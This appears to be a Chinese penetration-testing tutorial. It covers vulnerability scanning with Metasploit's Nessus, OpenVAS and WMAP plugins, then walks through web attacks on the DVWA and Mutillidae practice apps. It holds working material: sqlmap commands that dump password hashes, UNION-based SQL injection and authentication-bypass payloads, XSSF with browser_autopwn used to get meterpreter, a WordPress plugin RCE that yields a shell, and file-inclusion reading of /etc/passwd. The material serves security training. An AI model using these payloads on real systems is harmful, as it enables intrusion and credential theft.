Metaspliot進行漏洞掃描

Metaspliot進行漏洞掃描

Metasploit框架是Metasploit項目中最著名的創作，是一個軟件開發、測試和利用漏洞的平台。它可以用來創建安全測試工具開發的模塊，也可利用模塊作為一個滲透測試系統。最初是由HD Moore在2003年創建作為一種便攜式網絡工具包。它是所有的安全研究人員和黑客之間最受歡迎的滲透測試工具之一。除了滲透測試，該工具還能夠在網絡和Web應用程序中執行一個很好的漏洞評估。它有一些著名的安全漏洞掃描器如 Nessus、 Nexpose、 open VAS 和 WMAP 內置的插件。

在本文中，我們要查看如何使用 Metasploit 內置插件來執行網絡和 web 應用程序的脆弱性評估。首先我們將啟動Nessus，跳轉到msfconsole，我們將看到如何在Backtrack中安裝 Nessus。它是很簡單的 ；只需執行一步一步的命令：

首先從Nessus其官方網站上下載Linux 版本並安裝它。然后注冊一個免費的許可證。在成功安裝后 Nessus，添加一個用戶，通過鍵入以下命令：/opt/nessus/sbin/nessus-adduser

觸發命令后，它將要求登錄用戶名和用戶密碼。為用戶的特權，只需按照選項完成它。

現在我們將注冊 Nessus 獲得許可證。所以輸入 /opt/nessus/bin/nessus-fetch –register <YOUR LICENSE>

注冊之后，它會從它的官方網站開始下載所有最新的插件。這將需要一些時間來完成整個安裝。在此之后，它將可以隨時使用。

所以，讓我們啟動 msfconsole 和 load nessus .

正如我們可以在上圖中看到，我們的Nessus插件加載成功。現在，輸入nessus_help，它會列出所有的Nessus的命令。

現在，我們將連接到Nessus從我們的本地主機開始掃描。用於連接到localhost，使用的命令是nessus_connect <你的用戶名>：<你的密碼>@localhost: 8834 < ok >，在這里我們使用的是nessus_connect rohit:toor@localhost:8834 ok .

正如我們所看到的，我們的Nessus進行身份驗證。現在，我們將檢查Nessus的掃描策略。對於這一點，我們輸入nessus_policy_list。

兩個策略??，"Internal Network Scan"和"External Network Scan"可供選擇（外部網絡和內部網絡)。首先是用於掃描內部網絡漏洞，然后是用於掃描外部網絡漏洞。

現在，我們要掃描目標主機。首先，我們要創建一個新的掃描。使用的命令是：nessus_scan_new <policy ID> <scan NAME> <Target IP>，例如，這里我們使用的是nessus_scan_new 2 NEW_SCAN 192.168.0.101,192.168.0.102

我們可以通過輸入nessus_scan_status檢查掃描過程的狀態，將會顯示我們的掃描過程中，狀態是否已經完成或沒有。在我們的列子，掃描仍然在運行，所以我們將等待一段時間。

過了一會兒，我們的掃描完成。現在，我們將通過輸入nessus_report_list檢查我們的報告，如下圖所示，我們的掃描完成。

若要打開該報表，我們使用命令 nessus_report_hosts < 報告 ID > ； 例如，在這里我們使用 nessus_report_hosts ff2b1531-6c18-0198-9029-59ddcdb6fc3f26566c9ad609d831：

在上面的截圖中我們可以看到主機 IP 192.168.0.101 的結果中有總共 85 嚴重性漏洞。這意味着安全漏洞的總數量是 85。

以下是不同漏洞的分類：

? Sev 0 表示高層次的漏洞;有0個。

? Sev 1 表示中等程度的漏洞;有53個。

? Sev 2 表示低級別的漏洞;有20個。

? Sev 3 表示信息漏洞;有12。

我們可以通過使用命令nessus_report_hosts_ports <Target IP> <Report ID>會看到漏洞的詳細協議名稱和服務，例如，這里我們使用的是nessus_report_host_ports 192.168.0.101 ff2b1531-6c18-0198-9029-59ddcdb6fc3f26566c9ad609d831：

現在，我們將這份報告發送到Nessus的控制台，所以在MSF中輸入：nessus_report_get ff2b1531-6c18-0198-9029 59ddcdb6fc3f26566c9ad609d831

正如在上面的圖中可以看到，我們的報告已成功導入。現在，通過Nessus的Web控制台登陸，我們能夠看到我們導入的報告。

   

Metaspliot進行漏洞掃描(2)-Openvas46+

在這篇文章中，我們將看到如何使用Metasploit的內置插件來執行網絡和Web應用程序的脆弱性評估。首先，我們將啟動OpenVAS和msfconsole之前，你必須在你的系統中安裝OpenVAS。在安裝過程中給出的Backtrack的官方網站 http://www.backtrack-linux.org/wiki/index.php/OpenVas。只要按照步驟。現在我們開始進入我們的話題，如何通過OpenVAS進行漏洞評估。

要運行OpenVAS，在msfconsole輸入load openvas，它會從它的數據庫中加載並打開VAS插件。

現在，輸入openvas_help，它會顯示OpenVAS所有的命令。

我們要通過命令openvas_connect連接到OpenVAS服務器，它會顯示完整的使用命令，這是openvas_connect username password host port <ssl-confirm> 用於連接到服務器。在我的情況下，命令是openvas_connect rohit toor localhost 9390 ok

這我們可以在上圖中看到，我們的OpenVAS連接成功。現在，我們將創建掃描的目標。創建目標的命令是openvas_target_create <scan NAME> <target IP> <any comments>。在下面的圖中，我們可以看到我的掃描名稱是windows7的，目標是192.168.0.101和注釋是new_scan，所以命令是openvas_target_create"windows7″ 192.168.0.101″new_scan"

創建目標后，我們希望看到OpenVAS的掃描配置列表，那么請輸入openvas_config_list。

OpenVAS 有四種類型的掃描配置 ； 我們將按要求選擇此選項。下一步輸入 openvas_target_list ，它將顯示您創建的目標。

現在我們有一個目標，我們也看到了掃描的配置，所以我們將創建一個任務來掃描我們的目標機器。

   

要創建任務，該命令是openvas_task_create <scanname> <COMMENT> <scanconfig ID> <targetID>

例如，在上面的圖中，我們輸入openvas_task_create windows7 new_scan 3 1

我們可以看到，我們創建的任何和任務ID，我們的目標機器為0。現在，通過輸入openvas_task_start <taskID>啟動任務。這里我們使用openvas_task_start 0

正如我們所看到的，啟動命令后，我們提交請求，這意味着我們的掃描現在應該開始。讓我們通過輸入open_vas_list檢查，它表明我們的掃描狀態運行和進步是1，這意味着1％。

等待一段時間，並再次檢查進度。

現在進度是80％，這意味着它幾乎完整。當掃描完成后，進度將顯示-1。和狀態顯示"Done"。

現在我們的掃描完成，所以我們可以下載該報告；輸入 openvas_report_list ，它將顯示數據庫中的所有報告。

有幾種格式供下載的報告。輸入openvas_format_list，它會列出所有可用的格式。

選擇格式后，我們就可以使用這個命令下載報告：openvas_report_download <report id> <format id> <path for saving report> <report name>。這里我們使用openvas_report_download 1 5 /root/Desktop report

該OpenVAS報告格式有一個bug：每當我試圖下載PDF或XML格式，它給出了空白報表，所以我再次下載該報告的HTML格式，這種格式是工作正常。

Metaspliot進行漏洞掃描(3)-wamp

在前面的文章中，我們學會了如何使用OpenVAS插件來進行網絡脆弱性評估。在這種延續中，我們將看到如何使用WMAP插件來執行Web應用程序漏洞評估。

WMAP最初是從一個名為SQLMap的工具創建了一個功能豐富的Web漏洞掃描程序。該工具集成了Metasploit工具，使我們能夠從框架內進行web應用掃描。

啟動msfconsole和load WMAP

它會從它的數據庫中加載並打開WMAP插件。現在，輸入help，它會顯示WMAP所有使用的命令。

正如在上面的圖中可以看出，wmap_sites命令是用來管理網站，所以我們要使用這個命令。輸入wmap_sites -H ，它會顯示用於管理所有網站使用的選項。

在上圖中，我們可以看到，-a選項添加一個站點。因此，讓我們使用這個選項添加一個站點。輸入wmap_site -a <目標>。在這里，我們在本地機器上托管的Web應用程序。這就是為什么我們的目標IP是一個本地IP地址：wmap_sites -a http://192.168.0.102

一旦創建了該網站，我們可以檢查我們添加的站點，通過輸入 wmap_sites-l 將會列出這些。

我們網站已添加，現在我們將添加目標。在第一次使用輸入 wmap_targets -h 命令來列出所有 wmap_targets 用法選項。

正如我們可以在使用選項看到，我們可以通過兩種方式添加我們的目標。一個是-T，為此我們必須提供目標URL。如果我們使用-D，我們必須給出目標站點ID。在這里，我們將使用-d選項。因此我們的命令是wmap_targets -D 0

添加目標ID后，我們可以看到它加載的目標地址。現在我們可以檢查列表，查看我們的目標是增加，輸入wmap_targets -L

現在一切都准備好了，目標被成功添加，我們可以運行我們的WMAP用於掃描Web應用程序。掃描命令wmap_run，但是，在運行此命令之前，檢查所有的使用方式選項。輸入wmap_run-H

我們可以在選項中看到，-t 是為檢查所有啟用的模塊，用於掃描。所以輸入 wmap_run-t

觸發該命令后，它會顯示所有不同的測試模塊。

現在，鍵入wmap_run -E ，它會開始掃描所有啟用的模塊。

這將需要一些時間，具體取決於有多大的應用。掃描完成后，它會看起來像這樣。

現在，我們可以通過輸入vulns查詢所有漏洞。

我們可以看到在上圖中，在檢測到該應用程序上啟用跟蹤方法和脆弱性引用 CVE ID、 OSVD、 BID等，都顯示。

本文由InfoSecLab 整理翻譯，如有翻譯和編輯錯誤，請聯系管理員，我們將盡快處理，轉載請保留版權，謝謝，希望本文對你有所幫助。

MSF掃描結合web滲透攻擊技術

1.跨站腳本

反射型：利用郵件給受害者發送個惡意鏈接，受害者點擊時，惡意鏈接指向的服務器將注入的文件"反射"到受害者的瀏覽器上，並執行惡意文件。

存儲型：利用論壇、博客等web站點，將惡意腳本連同正常信息一起注入帖子內容中，並隨帖子一起存儲到論壇、博客服務器，當有用戶瀏覽該帖子時，惡意腳本將在瀏覽器上運行。

DOM型：構造一個URL鏈接，鏈接上包含有javascript等腳本，當受害者點擊這個URL時，將請求並執行腳本。

 

2.使用metasploit自帶的wmap web掃描器

msf > db_connect -y /opt/metasploit/config/database.yml

msf > load wmap

 

.-.-.-..-.-.-..---..---.

| | | || | | || | || |-'

`-----'`-'-'-'`-^-'`-'

[WMAP 1.5.1] ===  et [  ] metasploit.com 2012

[*] Successfully loaded plugin: wmap

 

wmap Commands

=============

 

    Command       Description

    -------       -----------

    wmap_modules  Manage wmap modules

    wmap_nodes    Manage nodes

    wmap_run      Test targets

    wmap_sites    Manage sites

    wmap_targets  Manage targets

    wmap_vulns    Display web vulns

 

添加目標網站

msf > wmap_sites -a http://10.10.10.129

 

msf > wmap_sites -l

 

添加掃描目標 

msf > wmap_targets -t http://10.10.10.129

 

查看將使用的模塊

msf > wmap_run -t

 

掃描並進行攻擊

msf > wmap_run -e

 

[*] 10.10.10.129 (Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_python/3.3.1 Python/2.6.5 mod_perl/2.0.4 Perl/v5.10.1) WebDAV disabled.

[*] Module auxiliary/scanner/http/robots_txt

[*] [10.10.10.129] /robots.txt found

 

服務器的信息和敏感文件都找到了

 

再通過vulns查看漏洞信息

msf > vulns

[*] Time: 2013-10-22 00:56:24 UTC Vuln: host=10.10.10.129 name=HTTP Trace Method Allowed refs=CVE-2005-3398,CVE-2005-3498,OSVDB-877,BID-11604,BID-9506,BID-9561 

[*] Time: 2013-10-22 00:06:40 UTC Vuln: host=10.10.10.130 name=Microsoft Server Service Relative Path Stack Corruption refs=CVE-2008-4250,OSVDB-49243,MSB-MS08-067,URL-http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos 

 

結果還是不錯的。

 

metasploit的滲透模塊在module中的文件夾下，主要集中在exploit/unix/webapp  exploit/windows/http  exploit/multi/http.

 

3.開源的web漏洞掃描工具

wapiti 對sql注入的掃描准確度排名第一

w3af 功能強大，配置繁瑣

sandcat 對XSS檢測效率最好

burp suite web滲透利器  

 

4.掃描神器w3af

支持讀入配置好的腳本文件，也可以將下面一段直接復制進去

plugins

bruteforce

bruteforce formAuthBrute

bruteforce config formAuthBrute

set passwdFile True

set usersFile True

back

audit xss,sqli

discovery webSpider

discovery config webSpider

set onlyForward True

back

back

target

set target http://www.dvssc.com/dvwa/index.php

back

plugins

output htmlFile

output config htmlFile

set verbose True

set fileName aa.html

back

back

start

 

 

結果如下

SQL injection in a MySQL database was found at: "http://www.dvssc.com/dvwa/login.php", using HTTP method POST. The sent post-data was: "username=d'z"0&Login=Login&password=FrAmE30.". The modified parameter was "username". This vulnerability was found in the request with id 311.

 

URL : http://www.dvssc.com/dvwa/login.php

Severity : High

 

值得一提的是：w3af還有很多小工具保存在tools目錄下，如base64decode,md5hash等。

 

 

5.SQL注入漏洞的探測

登陸語句一般為select * from * where user='**' and pass='**'

改成這樣就直接繞過了

select * from * where user='admin' or '1=1'and pass='**' 即輸入admin' or '1=1

 

里面有個專門用來學習sql注入的網頁，我們試試sqlmap

root@bt:~# cd /pentest/database/sqlmap

 

在使用之前我們需要知道referer 和cookie的值

可以使用火狐的tamperdata，我的火狐版本較高，這個不兼容，這里使用的是wireshark

 

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45'

 

[10:29:07] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 

[10:29:07] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable

[10:29:42] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)

web application technology: PHP 5.3.2, Apache 2.2.14

back-end DBMS: MySQL 5.0

 

獲得信息較詳細了

 

獲取數據庫名

./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' --dbs -v 0

 

[10:38:55] [WARNING] reflective value(s) found and filtering out

available databases [2]:

[*] dvwa

[*] information_schema  mysql默認的

 

獲取表名

./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables

[10:41:17] [WARNING] reflective value(s) found and filtering out

Database: dvwa

[2 tables]

+-----------+

| guestbook |

| users     |

+-----------+

 

獲取列名

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables -T users --columns

Database: dvwa

Table: users

[6 columns]

+------------+-------------+

| Column     | Type        |

+------------+-------------+

| avatar     | varchar(70) |

| first_name | varchar(15) |

| last_name  | varchar(15) |

| password   | varchar(32) |

| user       | varchar(15) |

| user_id    | int(6)      |

+------------+-------------+

 

導出password列的內容

./sqlmap.py -u'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aaa&Submit=Submit#' --cookie='security=low; PHPSESSID=qjqe7ht1bi9davum40hufaau45' -D dvwa --tables -T users --columns --dump

 

recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] n

Database: dvwa

Table: users

[5 entries]

+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+

| user_id | user    | avatar                                          | password                        | last_name | first_name |

+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+

| 1       | admin   | http://owaspbwa/dvwa/hackable/users/admin.jpg   | 21232f297a57a5a743894a0e4a801fc3 | admin     | admin      |

| 2       | gordonb | http://owaspbwa/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 | Brown     | Gordon     |

| 3       | 1337    | http://owaspbwa/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b | Me        | Hack       |

| 4       | pablo   | http://owaspbwa/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 | Picasso   | Pablo      |

| 5       | smithy  | http://owaspbwa/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 | Smith     | Bob        |

+---------+---------+-------------------------------------------------+----------------------------------+-----------+------------+

 

剩下的就是破解MD5值了

 

值得一提的是，sqlmap 還支持通過數據庫注入一個交互的shell

 

root@bt:/pentest/database/sqlmap# ./sqlmap.py -h | grep shell

    --os-shell          Prompt for an interactive operating system shell

    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC

--os-shell 提供四種不同的shell（ASP,ASPX,PHP,JSP）

 

我們再試試手工注入

輸入1時

ID: 1

First name: admin

Surname: admin

 

說明這是個查詢 語句類似於： select firstname,surname from table where id='1'

 

輸入' or '1'='1'#

看到所有的結果

 

輸入1' order by 3#  出錯

說明表里面只有兩列

 

mysql有個默認的數據庫information_schema,里面有個叫tables的表，里面保存了整個Mysql所有庫、表的信息

table_schema和table_name是其中表示庫名和表名的兩列

' union select 1,table_name from information_schema.tables#

 

這樣我們就得到了除系統自帶表以外的表了，這里最后兩個是用戶自己添加的

ID: ID: ' union select table_schema,table_name from information_schema.tables#

First name: dvwa

Surname: guestbook

 

ID: ID: ' union select table_schema,table_name from information_schema.tables#

First name: dvwa

Surname: users

 

很輕松的得到了庫名和表名，我們關心的是users表

 

mysql默認的數據庫information_schema有張表還保存了每張表的列名，表名為columns

意味着我們還能查詢到users表的所有列名

' union select 1,column_name from information_schema.columns where table_name='users'#

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: user_id

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: first_name

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: last_name

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: user

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: password

 

ID: ' union select 1,column_name from information_schema.columns where table_name='users'#

First name: 1

Surname: avatar

 

那么就剩下獲取字段的內容了

' union select user,password from dvwa.users#

 

ID: ' union select user,password from dvwa.users#

First name: admin

Surname: 21232f297a57a5a743894a0e4a801fc3

 

ID: ' union select user,password from dvwa.users#

First name: gordonb

Surname: e99a18c428cb38d5f260853678922e03

 

ID: ' union select user,password from dvwa.users#

First name: 1337

Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

 

ID: ' union select user,password from dvwa.users#

First name: pablo

Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

 

ID: ' union select user,password from dvwa.users#

First name: smithy

Surname: 5f4dcc3b5aa765d61d8327deb882cf99

 

ID: ' union select user,password from dvwa.users#

First name: user

Surname: ee11cbb19052e40b07aac0ca060c23ee

 

大功告成！

 

 

6.XSS漏洞探測 W3AF

 

plugins

audit xss

discovery webSpider

discovery config webSpider

set onlyForward True

back

back

target

set target http://www.dvssc.com/mutillidae/?page=add-to-your-blog.php

back

plugins

output htmlFile

output config htmlFile

set verbose True

set fileName mutillidae.html

back

back

start

 

結果是：

Cross Site Scripting was found at: "http://www.dvssc.com/mutillidae/index.php?page=add-to-your-blog.php", using HTTP method POST. The sent post-data was: "input_from_form=

 

URL : http://www.dvssc.com/mutillidae/index.php

Severity : Medium

 

7.web應用程序漏洞探測

wXf是一個web應用漏洞掃描和攻擊工具

https://github.com/WebExploitationFramework/wxf

 

BT5的Ruby版本有點低，在kali上能很好的運行

 

這里面支持一個wordpress的掃描模塊

 

8.XSS跨站攻擊

javascript能夠很好的增加網頁的豐富多樣性，因而使用還是比較廣泛的。

想成功執行一個XSS，需要兩個步驟：

1.攻擊者發送的數據沒有被過濾或是刪除。

2.web應用返回的數據沒有經過編碼。

 

對於一個安全的web應用來說，返回頁面的每一個特殊字符包括&  < > 、 /都應該經過編碼，最好是進行16進制編碼。

 

針對http://www.dvssc.com/dvwa/vulnerabilities/xss_r這個網站

當我們輸入

直接彈框XSS

很明顯的一個反射式跨站漏洞。

 

而存儲型的跨站攻擊並不需要直接對網站的某個輸入點進行輸入，而是長期存儲在web應用中並作為一個內容。

 

對於存儲型的http://www.dvssc.com/dvwa/vulnerabilities/xss_s/

在發表文章的撰寫文章並提交，在輸入框中輸入

而這個js里面就包括了獲取session和cookie的代碼。

 

當別人訪問你的文章時，信息就被竊取了。

 

 

9.跨站腳本攻擊框架XSSF

https://code.google.com/p/xssf/downloads/list下載

把里面的四個文件夾data,lib,modules和plugin合並到/opt/framework/msf3里面的文件夾

msf > load xssf

 

msf > xssf_urls

[+] XSSF Server : 'http://192.168.0.4:8888/' or 'http://:8888/'

[+] Generic XSS injection: 'http://192.168.0.4:8888/loop' or 'http://:8888/loop'

[+] XSSF test page : 'http://192.168.0.4:8888/test.html' or 'http://:8888/test.html'

 

以上就是我們的攻擊配置文件

 

當我們把鏈接 http://192.168.0.4:8888 通過存儲式跨站加入到博客里面，當第三方瀏覽這個博客同時點擊這個鏈接時，就能看到點擊者的信息。

 

查看被攻擊者的信息

msf > xssf_victims

 

查看具體主機

msf > xssf_information 4

 

如果是低版本的IE瀏覽器

我們可以使用相關的攻擊模塊

msf > use auxiliary/server/browser_autopwn

 

接着是使用metasploit的反彈回連模塊

msf >jobs

 

msf >xssf_exploit 2 14

最后得到一個meterpreter

 

10.命令注入攻擊

wordpress zingiri plugin滲透代碼，是一個php腳本

當然前提是wordpress裝有這個插件，並且還存在漏洞。

root@bt:~/Desktop# php exp.php 10.10.10.129 /wordpress/

 

+----------------------------------------------------------------------------------+

| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |

+----------------------------------------------------------------------------------+

 

zingiri-shell# 

zingiri-shell# id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

 

得到了一個shell，但是這個shell和www-data這個賬號的權限是相同的，還不夠高

root:x:0:0:root:/root:/bin/bash

www-data:x:33:33:www-data:/var/www:/bin/sh

 

11.文件包含和文件上傳漏洞

針對文件包含漏洞的頁面，也許改個參數你就能知道很多信息

http://192.168.0.3/dvwa/vulnerabilities/fi/?page=include.php

改成

http://192.168.0.3/dvwa/vulnerabilities/fi/?page=/etc/passwd

 

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false landscape:x:104:122::/var/lib/landscape:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:106:109:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash messagebus:x:107:114::/var/run/dbus:/bin/false tomcat6:x:108:115::/usr/share/tomcat6:/bin/false user:x:1000:1000:user,,,:/home/user:/bin/bash polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false haldaemon:x:110:119:Hardware abstraction layer,,,:/var/run/hald:/bin/false pulse:x:111:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false postfix:x:112:123::/var/spool/postfix:/bin/false 

 

這就有了很多信息了。

 

對於文件長傳漏洞，上傳特制的帶有webshell的文件，然后將page=提成遠程主機上webshell的url，這樣就有了webshell，可以執行shell命令了。